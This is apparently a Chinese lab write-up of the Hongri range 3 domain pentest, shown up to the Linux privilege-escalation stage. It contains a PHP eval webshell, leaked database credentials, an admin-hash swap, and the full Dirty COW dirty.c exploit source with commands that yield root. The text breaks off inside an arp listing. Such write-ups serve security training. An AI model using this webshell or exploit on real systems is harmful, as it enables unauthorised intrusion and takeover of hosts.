豪爽 对我来说,还是非常有挑战的一次域渗透的 很有价值 截至目前,第二长的一篇文章了
靶场说明 参考大佬博客https://cloud.tencent.com/developer/article/2016323 https://cloud.tencent.com/developer/article/2016323 然后其他这个靶机有非常多的思路之类的,打法都不一样 比如,2026年暴露出来的linux提权,那肯定打老机器舒服多了,不一样要脏牛提权
红日靶场3考点介绍 flag在域控的C:\Users\Administrator\Documents\flag.txt
靶场整体结构 该靶场是一个典型的多层内网渗透场景,攻击链从外网 Web 入口开始,逐步横向到 Linux 跳板机、Windows 成员机,最后进入域控获取最终 flag。
第一层考点:外网 Web 信息泄露 外网入口是 Joomla 站点,存在敏感备份文件泄露,例如 configuration.php~,可以直接拿到数据库连接信息。
同时存在 phpinfo 页面,可用于确认 PHP 版本、系统版本和 disable_functions 状态。
第二层考点:Joomla 后台接管 攻击者可以通过数据库层面对 Joomla 用户进行控制,例如新增管理员或接管后台账号。
登录后台后,可以利用模板编辑功能修改模板文件,从而写入 WebShell。
第三层考点:WebShell 与命令执行 虽然目标存在 disable_functions 限制,但仍可通过绕过手段实现命令执行。
该层重点考察的是在受限 PHP 环境下构造稳定命令执行链路的能力。
第四层考点:主机取证与线索恢复 WebShell 只是起点,后续需要在主机上继续搜索历史文件、交换文件、配置文件和用户痕迹,从而发现 SSH 或内网凭据。
这部分考察的是落地后的信息搜集能力,而不是单纯拿壳即结束。
第五层考点:Linux 本地提权 获取到 SSH 低权限用户后,需要继续在 Linux 跳板机上提权。
靶场原始思路是利用低版本内核的 Dirty COW 漏洞实现 root 权限。
第六层考点:内网代理与横向移动 Linux 跳板机拥有双网卡,可连接外层网络和内层 192.168.93.0/24 网络,因此可以作为内网代理枢纽。
攻击者需要通过 socks、端口转发或其它转发方式,把自己的探测能力延伸到内网。
第七层考点:Windows 成员机入侵 内网成员机存在可利用的管理员口令,可通过 SMB、WMI、PsExec、RDP 等方式进入。
这一层重点是利用已有凭据完成系统接管,并为后续域控渗透做准备。
第八层考点:凭据抓取与域信息收集 进入 Windows 成员机后,可用 mimikatz 或 secretsdump 获取本地凭据、缓存域凭据、机器账户密钥和服务密钥。
同时可以识别域名、DNS 指向、域控地址等关键 AD 线索。
第九层考点:域控登录 获取域管理员凭据后,可以通过 WMI、SMB、RDP 等方式登录域控,最终读取 flag。
这一层考察的是凭据复用与域内最后一跳的执行能力。
核心考点总结 Joomla 信息泄露与后台接管 模板编辑写 WebShell disable_functions 绕过 主机痕迹搜索与凭据恢复 Linux 内核提权 内网代理与横向移动 Windows 管理口令利用 mimikatz 与 secretsdump 凭据抓取 域控接管与最终 flag 获取 靶场特点 该靶场不是单点漏洞题,而是多阶段、多系统、多网段联动的综合内网渗透题,适合练习完整攻击链构建能力。
我们来跟着靶机,边打边补知识点
打法思路 首先就是配置VPN,然后目标地址 192.168.111.20 我们先来ping一下这个东西
1 2 3 4 5 6 7 8 9 10 11 12 C:\Users\31349>ping 192.168.111.20 正在 Ping 192.168.111.20 具有 32 字节的数据: 来自 192.168.111.20 的回复: 字节=32 时间=52ms TTL=63 来自 192.168.111.20 的回复: 字节=32 时间=53ms TTL=63 来自 192.168.111.20 的回复: 字节=32 时间=53ms TTL=63 来自 192.168.111.20 的回复: 字节=32 时间=52ms TTL=63 192.168.111.20 的 Ping 统计信息: 数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失), 往返行程的估计时间(以毫秒为单位): 最短 = 52ms,最长 = 53ms,平均 = 52ms
然后本机地址 192.168.111.25 现在的情况就是,我们的这个openvpn信息可以看到,OPENVPN虚拟网卡的IP10.8.0.6,就是电脑和靶机OPENVPN服务器通信的隧道地址 上面这个可以输入ipconfig查看得知
1 2 3 4 5 未知适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 本地链接 IPv6 地址. . . . . . . . : fe80::2422:473:2ece:9b98%3 IPv4 地址 . . . . . . . . . . . . : 10.8.0.6
然后靶机看到我们的地址就是192.168.111.25 然后不看这个IP地址正确性,大概的拓扑图如下
os:图片应该能加载出来吧
访问一下目的地址,使用Wappalyzer看一下CMS
发现使用的是joomla 这个时候我们就是说想要知道这个版本号是多少 kali使用命令
1 2 3 4 5 msfconsole use auxiliary/scanner/http/joomla_version set RHOSTS 192.168.111.20 set RPORT 80 run
结果返回
1 2 3 4 5 6 7 8 9 10 11 msf > use auxiliary/scanner/http/joomla_version msf auxiliary(scanner/http/joomla_version) > set RHOSTS 192.168.111.20 RHOSTS => 192.168.111.20 msf auxiliary(scanner/http/joomla_version) > set RPORT 80 RPORT => 80 msf auxiliary(scanner/http/joomla_version) > run [*] Server: nginx/1.9.4 [+] Joomla version: 3.9.12 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(scanner/http/joomla_version) >
扫出来:Joomla 3.9.12 ,Web 服务 nginx/1.9.4 知道版本号之后就可以在网上的各大漏洞库或者有什么漏洞扫描工具之类的,看看存不存在有可以利用的漏洞 扫一下目录
1 dirsearch -u http://192.168.111.20/
发现了robots.txt、网站的后台/administrator/和一个configuration.php~文件 dirsearch自指定路径,比如你觉得他这个字典不行,想要自己的这个字典 我们就搞一个这个
1 python dirsearch.py -u http://192.168.111.20/ -w "C:\Users\你的用户名\Desktop\joomla.txt"
访问这个http://192.168.111.20/administrator/ 得到一个登陆框,这里就不考虑爆破这些工具手法了 访问http://192.168.111.20/configuration.php ~ 一定要记住后面那个符号 然后看这个的配置文件
1 2 3 4 5 6 7 8 9 10 11 12 <?php class JConfig { public $offline = '0'; public $offline_message = '缃戠珯姝e湪缁存姢銆�<br /> 璇风◢鍊欒闂€�'; public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'test'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; ......
得到数据库的这个账号密码
1 2 3 4 5 6 7 public $debug_lang_const = '1'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'testuser'; public $password = 'cvcvgjASD!@'; public $db = 'joomla'; public $dbprefix = 'am2zu_';
这里可以看见连接成功了
然后在joomla库am2zu_users表中可以看到管理员账号密码
1 username:admin2,password:d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
问GPT知道加密方式 然后可以叫GPT生成一个同一个加密方式的
1 2 admin 加密后的,放入数据库:433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT
然后账号admin2,密码admin登陆进去 然后下一步就是靠经验来打了,不会的话就是积累一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Templates: Styles (Site) Main content begins here Default Edit Duplicate Delete Options Help × Joomla! would like your permission to collect some basic statistics. To better understand our install base and end user environments it is helpful if you send some site information back to a Joomla! controlled central server. No identifying data is captured at any point. You can change these settings later from Plugins > System - Joomla! Statistics. Select here to see the information that will be sent. Enable Joomla Statistics? Always Once Never Styles Templates Search Search Search Tools Clear Style Default Pages No preview available. You can enable preview in the options.Beez3 - Default Not assigned No preview available. You can enable preview in the options.protostar - Default
然后这里可以编辑或者创建,写入木马,1.php
1 2 <?php @eval($_POST['cmd']); phpinfo(); ?>
然后访问
1 http://192.168.111.20/templates/beez3/1.php
可以看到成功进入了
连接蚁剑
但是执行命令发现都失败了
看到disable_functions
1 disable_functions exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
对应地址右键,选择绕过函数功能,我这边截图太白了,就截图一部分了。我记得当时下载这个插件也挺麻烦的,主要是代理问题,但是要是真打PHP环境的话,肯定还是非常好用的
选择PHP7_UserFilter模式绕过 成功拿到shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 (www-data:ret=) $ (*) 基础信息 当前路径: /var/www/html/templates/beez3 磁盘列表: / 系统信息: Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 当前用户: www-data (*) 输入 ashelp 查看本地命令 (www-data:/var/www/html/templates/beez3) $ ls 1.php component.php css error.php favicon.ico html images index.php javascript jsstrings.php language templateDetails.xml template_preview.png template_thumbnail.png (www-data:/var/www/html/templates/beez3) $
查看本机内网IP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 (www-data:/var/www/html/templates/beez3) $ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 00:50:56:b1:40:d1 brd ff:ff:ff:ff:ff:ff inet 192.168.93.120/24 brd 192.168.93.255 scope global ens33 valid_lft forever preferred_lft forever inet6 fe80::250:56ff:feb1:40d1/64 scope link valid_lft forever preferred_lft forever (www-data:/var/www/html/templates/beez3) $
192.168.93.120就是我们要的 主机信息
1 2 3 4 5 6 rever preferred_lft forever inet6 fe80::250:56ff:feb1:40d1/64 scope link valid_lft forever preferred_lft forever (www-data:/var/www/html/templates/beez3) $ uname -a Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux (www-data:/var/www/html/templates/beez3) $
/tmp/mysql/test.txt目录下有
1 2 adduser wwwuser passwd wwwuser_123Aqx
可以看到是是系统 Linux 账号 wwwuser 的密码 我们去连接这台linux 我们回到本题,http://192.168.111.20/这里就是我们上传shell的地方 我们在蚁剑的时候看到的IP是192.168.93.120,内网 Ubuntu 机器(真实跑 Joomla) ,Nginx 把 http 请求转发给它,webshell 实际落地在这台 所以我们肯定连接不了那台内网机器,直接连接上外网的这台,然后通过外网的这台来继续渗透 不直接用ssh连接是因为旧版的ssh需要我们指定rsa连接方式
1 ssh -o HostKeyAlgorithms=+ssh-rsa wwwuser@192.168.111.20
信息搜集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [wwwuser@localhost ~]$ uname -a Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux [wwwuser@localhost ~]$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:50:56:b1:dc:6f brd ff:ff:ff:ff:ff:ff inet 192.168.111.20/24 scope global eth0 inet6 fe80::250:56ff:feb1:dc6f/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:50:56:b1:a2:a8 brd ff:ff:ff:ff:ff:ff inet 192.168.93.100/24 scope global eth1 inet6 fe80::250:56ff:feb1:a2a8/64 scope link valid_lft forever preferred_lft forever [wwwuser@localhost ~]$
符合我们上面的推测,必须的先推测,不然你都不知道要连哪台 木马 (webshell) 流量走80 端口 HTTP 反向代理 ,可以穿透;SSH 是直接访问内网机器 22 端口,你的 Kali 没有到192.168.93.0/24的路由,所以连不到内网 Ubuntu 然后继续信息搜集
1 2 3 [wwwuser@localhost ~]$ cat /proc/version Linux version 2.6.32-431.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Fri Nov 22 03:15:09 UTC 2013 [wwwuser@localhost ~]$
内核为2.6.32-431.el6,完全符合脏牛提权的条件,直接利用: python2 -m SimpleHTTPServer 8000开启简易 HTTP 文件服务 ,用来让跳板 CentOS 机器下载 exp(dcow 脏牛) 可以下,当然也可以直接编写EXP
然后输入源码
1 2 3 4 `i`粘贴全部代码,`Esc` → `:wq` 再运行 gcc -pthread dirty.c -o dcow -lcrypt ./dcow
拉取的做法
1 2 3 wget xxx.xxx chmod +x dcow ./dcow
我选的是服务器下载源码到/var/www/html/dirty.c下面 然后编译下
1 2 cd /var/www/html gcc -pthread dirty.c -o dirty -lcrypt
执行过程
1 2 3 4 root@iZtvt92ufty3mlZ:/var/www/html# cd /var/www/html root@iZtvt92ufty3mlZ:/var/www/html# root@iZtvt92ufty3mlZ:/var/www/html# gcc -pthread dirty.c -o dirty -lcrypt root@iZtvt92ufty3mlZ:/var/www/html#
然后再看下文件是否存在,存在代表编译好了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@iZtvt92ufty3mlZ:/var/www/html# ls -l 总计 76 -rw-r--r-- 1 root root 171 11月 1 2025 1.dtd -rw-r--r-- 1 root root 164 11月 2 2025 1.php -rw-r--r-- 1 www-data www-data 596 10月 29 2025 cookie.php -rw-r--r-- 1 www-data www-data 546 10月 29 2025 cookie.php.save -rw-r----- 1 www-data www-data 1690 1月 21 2026 cookie.txt -rwxr-xr-x 1 root root 17336 10月 5 20:52 dirty -rwxr-xr-x 1 root root 4795 10月 5 20:49 dirty.c -rw-r--r-- 1 root root 109 11月 1 2025 dtd.php -rw-r--r-- 1 root root 10671 10月 29 2025 index.html -rw-r--r-- 1 root root 615 10月 29 2025 index.nginx-debian.html -rw-r--r-- 1 root root 52 11月 1 2025 ssrf.php -rw-r--r-- 1 root root 151 11月 1 2025 test.dtd root@iZtvt92ufty3mlZ:/var/www/html#
但是好像就是说那台机器好像都不能访问外网
1 2 3 [wwwuser@localhost ~]$ ping 8.8.8.8 connect: Network is unreachable [wwwuser@localhost ~]$
得到确认 测试出不出网的问题
1 2 3 4 5 6 7 8 9 10 11 # 先看有没有默认路由 ip route # 测公网 IP,排除 DNS 问题 ping -c 3 8.8.8.8 # 再测 DNS ping -c 3 www.baidu.com # 测 HTTP/HTTPS 出网 curl -I --connect-timeout 5 https://www.baidu.com
第一个结果是
1 2 3 4 5 [wwwuser@localhost ~]$ ip route 192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.100 192.168.111.0/24 dev eth0 proto kernel scope link src 192.168.111.20 [wwwuser@localhost ~]$
现在整理下思路,192.168.93.120是蚁剑那台,192.168.111.20是我们ssh那台 我们用ssh那台来ping蚁剑那台,
1 2 3 4 5 ping 192.168.93.120 PING 192.168.93.120 (192.168.93.120) 56(84) bytes of data. 64 bytes from 192.168.93.120: icmp_seq=1 ttl=64 time=1.33 ms 64 bytes from 192.168.93.120: icmp_seq=2 ttl=64 time=0.200 ms
可以看到是通的。我们现在要提权的是SSH那台 两种思路,理论上 第一,ssh那台直接写脚本然后运行 第二,蚁剑那台写脚本,然后开个服务,ssh那台下载编译运行 我们试试第一个,然后主要就是说能实现这个,考虑到老版本,也许脚本会有改动,可以叫ai给你改下 github高star的脏牛提权脚本
https://github.com/firefart/dirtycow/blob/master/dirty.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 // // This exploit uses the pokemon exploit of the dirtycow vulnerability // as a base and automatically generates a new passwd line. // The user will be prompted for the new password when the binary is run. // The original /etc/passwd file is then backed up to /tmp/passwd.bak // and overwrites the root account with the generated line. // After running the exploit you should be able to login with the newly // created user. // // To use this exploit modify the user values according to your needs. // The default is "toor". // // Original exploit (dirtycow's ptrace_pokedata "pokemon" method): // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c // // Compile with: // gcc -pthread dirty.c -o dirty -lcrypt // // Then run the newly create binary by either doing: // "./dirty" or "./dirty my-new-password" // // Afterwards, you can either "su toor" or "ssh toor@..." // // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! // mv /tmp/passwd.bak /etc/passwd // // Exploit adopted by Christian "firefart" Mehlmauer // https://firefart.at // #include <fcntl.h> #include <pthread.h> #include <string.h> #include <stdio.h> #include <stdint.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <stdlib.h> #include <unistd.h> #include <crypt.h> const char *filename = "/etc/passwd"; const char *backup_filename = "/tmp/passwd.bak"; const char *salt = "toor"; int f; void *map; pid_t pid; pthread_t pth; struct stat st; struct Userinfo { char *username; char *hash; int user_id; int group_id; char *info; char *home_dir; char *shell; }; char *generate_password_hash(char *plaintext_pw) { return crypt(plaintext_pw, salt); } char *generate_passwd_line(struct Userinfo u) { const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; int size = snprintf(NULL, 0, format, u.username, u.hash, u.user_id, u.group_id, u.info, u.home_dir, u.shell); char *ret = malloc(size + 1); sprintf(ret, format, u.username, u.hash, u.user_id, u.group_id, u.info, u.home_dir, u.shell); return ret; } void *madviseThread(void *arg) { int i, c = 0; for(i = 0; i < 200000000; i++) { c += madvise(map, 100, MADV_DONTNEED); } printf("madvise %d\n\n", c); } int copy_file(const char *from, const char *to) { // check if target file already exists if(access(to, F_OK) != -1) { printf("File %s already exists! Please delete it and run again\n", to); return -1; } char ch; FILE *source, *target; source = fopen(from, "r"); if(source == NULL) { return -1; } target = fopen(to, "w"); if(target == NULL) { fclose(source); return -1; } while((ch = fgetc(source)) != EOF) { fputc(ch, target); } printf("%s successfully backed up to %s\n", from, to); fclose(source); fclose(target); return 0; } int main(int argc, char *argv[]) { // backup file int ret = copy_file(filename, backup_filename); if (ret != 0) { exit(ret); } struct Userinfo user; // set values, change as needed user.username = "toor"; user.user_id = 0; user.group_id = 0; user.info = "pwned"; user.home_dir = "/root"; user.shell = "/bin/bash"; char *plaintext_pw; if (argc >= 2) { plaintext_pw = argv[1]; printf("Please enter the new password: %s\n", plaintext_pw); } else { plaintext_pw = getpass("Please enter the new password: "); } user.hash = generate_password_hash(plaintext_pw); char *complete_passwd_line = generate_passwd_line(user); printf("Complete line:\n%s\n", complete_passwd_line); f = open(filename, O_RDONLY); fstat(f, &st); map = mmap(NULL, st.st_size + sizeof(long), PROT_READ, MAP_PRIVATE, f, 0); printf("mmap: %lx\n",(unsigned long)map); pid = fork(); if(pid) { waitpid(pid, NULL, 0); int u, i, o, c = 0; int l=strlen(complete_passwd_line); for(i = 0; i < 10000/l; i++) { for(o = 0; o < l; o++) { for(u = 0; u < 10000; u++) { c += ptrace(PTRACE_POKETEXT, pid, map + o, *((long*)(complete_passwd_line + o))); } } } printf("ptrace %d\n",c); } else { pthread_create(&pth, NULL, madviseThread, NULL); ptrace(PTRACE_TRACEME); kill(getpid(), SIGSTOP); pthread_join(pth,NULL); } printf("Done! Check %s to see if the new user was created.\n", filename); printf("You can log in with the username '%s' and the password '%s'.\n\n", user.username, plaintext_pw); printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", backup_filename, filename); return 0; }
进入tmp目录 然后vi写入再编译运行
1 2 gcc -pthread dirty.c -o dirty -lcrypt && chmod 777 dirty && ./dirty 123456
然后有问题问AI,然后千万别信豆包这个SB给的.c脚本,就用我的github下载的,然后有问题问下AI(但是还是不要让它给你改脚本用它的)。或者你给更牛逼的AI 我是脱产在学校,搞不起GPT的cyber。妈的,这个SB豆包浪费老子两个小时 我信它的脚本,而不信自己在GITHUB上的脚本,还得我弄了半天,我成功的前一刻,它还在告诉我错误的答案
可以看到
1 2 3 [toor@localhost tmp]# id uid=0(toor) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [toor@localhost tmp]#
可以看到是root权限了 !!!千万注意,一定是可以脏牛提权的,提权失败不是靶机的问题,一定是你的问题 因为我怀疑是靶机问题还是源码下载过来了,白白浪费了很多时间 最后再骂一下,SB豆包 ip a ip route arp -n
ip a:看有没有第二块网卡,确认内网网卡 IP 192.168.93.100
ip route:看内核路由表,确认存在 192.168.93.0/24 网段路由
arp -n:看当前 arp 缓存,已经通信过的内网主机立刻展示,不用扫 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 [toor@localhost tmp]# ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:50:56:b1:dc:6f brd ff:ff:ff:ff:ff:ff inet 192.168.111.20/24 scope global eth0 inet6 fe80::250:56ff:feb1:dc6f/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 link/ether 00:50:56:b1:a2:a8 brd ff:ff:ff:ff:ff:ff inet 192.168.93.100/24 scope global eth1 inet6 fe80::250:56ff:feb1:a2a8/64 scope link valid_lft forever preferred_lft forever [toor@localhost tmp]# ip route 192.168.93.0/24 dev eth1 proto kernel scope link src 192.168.93.100 192.168.111.0/24 dev eth0 proto kernel scope link src 192.168.111.20 [toor@localhost tmp]# arp -n Address HWtype HWaddress Flags Mask Iface 192.168.93.250 (incomplete) eth1 192.168.93.19 (incomplete) eth1 192.168.93.171 (incomplete) eth1 192.168.93.57 (incomplete) eth1 192.168.93.42 (incomplete) eth1 192.168.93.99 (incomplete) eth1 192.168.93.90 (incomplete) eth1 192.168.93.244 (incomplete) eth1 192.168.93.133 (incomplete) eth1 192.168.93.215 (incomplete) eth1 192.168.93.212 (incomplete) eth1 192.168.93.162 (incomplete) eth1 192.168.93.35 (incomplete) eth1 192.168.93.113 (incomplete) eth1 192.168.93.60 (incomplete) eth1 192.168.93.39 (incomplete) eth1 192.168.93.74 (incomplete) eth1 192.168.93.175 (incomplete) eth1 192.168.93.52 (incomplete) eth1 192.168.93.152 (incomplete) eth1 192.168.93.194 (incomplete) eth1 192.168.93.172 (incomplete) eth1 192.168.93.174 (incomplete) eth1 192.168.93.180 (incomplete) eth1 192.168.93.195 (incomplete) eth1 192.168.93.141 (incomplete) eth1 192.168.93.91 (incomplete) eth1 192.168.93.103 (incomplete) eth1 192.168.93.89 (incomplete) eth1 192.168.93.68 (incomplete) eth1 192.168.93.159 (incomplete) eth1 192.168.93.49 (incomplete) eth1 192.168.93.121 (incomplete) eth1 192.168.93.247 (incomplete) eth1 192.168.93.203 (incomplete) eth1 192.168.93.253 (incomplete) eth1 192.168.93.87 (incomplete) eth1 192.168.93.130 (incomplete) eth1 192.168.93.143 (incomplete) eth1 192.168.93.95 (incomplete) eth1 192.168.93.92 (incomplete) eth1 192.168.93.248 (incomplete) eth1 192.168.93.7 (incomplete) eth1 192.168.93.53 (incomplete) eth1 192.168.93.251 (incomplete) eth1 192.168.93.107 (incomplete) eth1 192.168.93.202 (incomplete) eth1 192.168.93.129 (incomplete) eth1 192.168.93.201 (incomplete) eth1 192.168.93.120 ether 00:50:56:b1:40:d1 C eth1 192.168.93.117 (incomplete) eth1 192.168.93.1 (incomplete) eth1 192.168.93.223 (incomplete) eth1 192.168.93.18 (incomplete) eth1 192.168.93.254 (incomplete) eth1 192.168.93.61 (incomplete) eth1 192.168.93.33 (incomplete) eth1 192.168.93.58 (incomplete) eth1 192.168.93.150 (incomplete) eth1 192.168.93.230 (incomplete) eth1 192.168.93.157 (incomplete) eth1 192.168.93.24 (incomplete) eth1 192.168.93.187 (incomplete) eth1 192.168.93.218 (incomplete) eth1 192.168.93.188 (incomplete) eth1 192.168.93.45 (incomplete) eth1 192.168.93.184 (incomplete) eth1 192.168.93.13 (incomplete) eth1 192.168.93.178 (incomplete) eth1 192.168.93.79 (incomplete) eth1 192.168.93.142 (incomplete) eth1 192.168.93.50 (incomplete) eth1 192.168.93.235 (incomplete) eth1 192.168.93.81 (incomplete) eth1 192.168.93.237 (incomplete) eth1 192.168.93.38 (incomplete) eth1 192.168.93.96 (incomplete) eth1 192.168.93.54 (incomplete) eth1 192.168.93.239 (incomplete) eth1 192.168.93.31 (incomplete) eth1 192.168.93.44 (incomplete) eth1 192.168.93.109 (incomplete) eth1 192.168.93.88 (incomplete) eth1 192.168.93.26 (incomplete) eth1 192.168.93.128 (incomplete) eth1 192.168.93.234 (incomplete) eth1 192.168.93.186 (incomplete) eth1 192.168.93.101 (incomplete) eth1 192.168.93.6 (incomplete) eth1 192.168.93.209 (incomplete) eth1 192.168.93.165 (incomplete) eth1 192.168.93.11 (incomplete) eth1 192.168.93.196 (incomplete) eth1 192.168.93.191 (incomplete) eth1 192.168.93.85 (incomplete) eth1 192.168.93.214 (incomplete) eth1 192.168.93.211 (incomplete) eth1 192.168.93.185 (incomplete) eth1 192.168.93.125 (incomplete) eth1 192.168.93.132 (incomplete) eth1 192.168.93.8 (incomplete) eth1 192.168.93.62 (incomplete) eth1 192.168.93.10 ether 00:50:56:b1:83:3a C eth1 192.168.93.232 (incomplete) eth1 192.168.93.22 (incomplete) eth1 192.168.93.176 (incomplete) eth1 192.168.111.25 ether 00:50:56:b1:66:7e C eth0 192.168.93.75 (incomplete) eth1 192.168.93.82 (incomplete) eth1 192.168.93.70 (incomplete) eth1 192.168.93.15 (incomplete) eth1 192.168.93.41 (incomplete) eth1 192.168.93.9 (incomplete) eth1 192.168.93.241 (incomplete) eth1 192.168.93.4 (incomplete) eth1 192.168.93.221 (incomplete) eth1 192.168.93.220 (incomplete) eth1 192.168.93.98 (incomplete) eth1 192.168.93.112 (incomplete) eth1 192.168.93.104 (incomplete) eth1 192.168.93.183 (incomplete) eth1 192.168.93.118 (incomplete) eth1 192.168.93.27 (incomplete) eth1 192.168.93.210 (incomplete) eth1 192.168.93.154 (incomplete) eth1 192.168.93.110 (incomplete) eth1 192.168.93.208 (incomplete) eth1 192.168.93.40 (incomplete) eth1 192.168.93.97 (incomplete) eth1 192.168.93.72 (incomplete) eth1 192.168.93.29 (incomplete) eth1 192.168.93.217 (incomplete) eth1 192.168.93.166 (incomplete) eth1 192.168.93.64 (incomplete) eth1 192.168.93.145 (incomplete) eth1 192.168.93.216 (incomplete) eth1 192.168.93.77 (incomplete) eth1 192.168.93.73 (incomplete) eth1 192.168.93.93 (incomplete) eth1 192.168.93.229 (incomplete) eth1 192.168.93.205 (incomplete) eth1 192.168.93.119 (incomplete) eth1 192.168.93.36 (incomplete) eth1 192.168.93.204 (incomplete) eth1 192.168.93.55 (incomplete) eth1 192.168.93.139 (incomplete) eth1 192.168.93.124 (incomplete) eth1 192.168.93.84 (incomplete) eth1 192.168.93.67 (incomplete) eth1 192.168.93.25 (incomplete) eth1 192.168.93.169 (incomplete) eth1 192.168.111.132 (incomplete) eth0 192.168.93.228 (incomplete) eth1 192.168.93.170 (incomplete) eth1 192.168.93.240 (incomplete) eth1 192.168.93.105 (incomplete) eth1 192.168.93.37 (incomplete) eth1 192.168.93.224 (incomplete) eth1 192.168.93.86 (incomplete) eth1 192.168.93.71 (incomplete) eth1 192.168.93.199 (incomplete) eth1 192.168.93.106 (incomplete) eth1 192.168.93.56 (incomplete) eth1 192.168.93.198 (incomplete) eth1 192.168.93.131 (incomplete) eth1 192.168.93.69 (incomplete) eth1 192.168.93.80 (incomplete) eth1 192.168.93.32 (incomplete) eth1 192.168.93.177 (incomplete) eth1 192.168.93.16 (incomplete) eth1 192.168.93.197 (incomplete) eth1 192.168.93.149 (incomplete) eth1 192.168.93.108 (incomplete) eth1 192.168.93.189 (incomplete) eth1 192.168.93.144 (incomplete) eth1 192.168.93.111 (incomplete) eth1 192.168.93.151 (incomplete) eth1 192.168.93.138 (incomplete) eth1 192.168.93.66 (incomplete) eth1 192.168.93.238 (incomplete) eth1 192.168.93.137 (incomplete) eth1 192.168.93.76 (incomplete) eth1 192.168.93.245 (incomplete) eth1 192.168.93.219 (incomplete) eth1 192.168.93.94 